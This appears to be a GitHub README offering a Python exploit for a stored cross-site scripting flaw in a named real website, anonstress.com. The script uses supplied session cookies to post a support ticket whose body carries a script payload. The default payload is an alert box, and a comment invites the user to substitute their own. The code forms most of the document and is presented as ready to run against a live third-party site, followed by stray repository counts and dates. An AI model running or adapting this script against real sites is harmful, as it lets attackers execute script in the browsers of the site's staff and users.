AnonStress Stored XSS Exploit
An exploit and demonstration on how to exploit a Stored XSS vulnerability in https://anonstress.com.
Details
| Vulnerability | Severity | Description |
|---|---|---|
| Stored XSS | 5.0/10 | This vulnerability allows attackers to execute arbitrary javascript code on a victims browser. |
Exploit
import sys
import requests
# https://anonstress.com Stored XSS Exploit
# Date: 09/25/21
# Author: Tactical
class Exploit:
def __init__(self, sesion_cookie, other_cookie):
self.sesion_cookie = sesion_cookie
self.other_cookie = other_cookie
self.title_name = "testone" # The name for the ticket | Note: You can change this.
self.xss_payload = "<script>alert(1)</script>" # Edit your own payload here if you would like.
def run(self):
site_cookies = {
"31k001c": self.other_cookie,
"fc_session": self.sesion_cookie
}
payload = {
"n3k0t": self.other_cookie,
"title": self.title_name,
"status": "1",
"details": self.xss_payload
}
s = requests.Session()
s.post("https://anonstress.com/support/ticket/create", cookies=site_cookies, data=payload)
def main() -> None:
if len(sys.argv) < 3:
print("Usage: python3 exploit.py <fc_session_cookie> <31k001c_cookie>")
sys.exit()
sesion_cookie = sys.argv[1]
other_cookie = sys.argv[2]
Exploit(sesion_cookie, other_cookie).run()
if __name__ == "__main__":
main()
Video & Demonstration by pin
https://user-images.githubusercontent.com/86132648/134786149-3f44568c-3fd3-442f-86bb-dd552cdfd1c8.mp4
14 Aug 17, 2022
116 Dec 29, 2022
4 Sep 29, 2021
9 Dec 17, 2022
33 Sep 28, 2022
2 Dec 30, 2021
58 Dec 05, 2022
4 Jan 10, 2022
25 Nov 10, 2022
11 Dec 06, 2022
3 Nov 23, 2022
47 Dec 21, 2022
19 Sep 07, 2022
14 Jul 08, 2022
4 Sep 03, 2022
31 Oct 21, 2022
165 Dec 21, 2022
1 Jan 27, 2022
87 Dec 29, 2021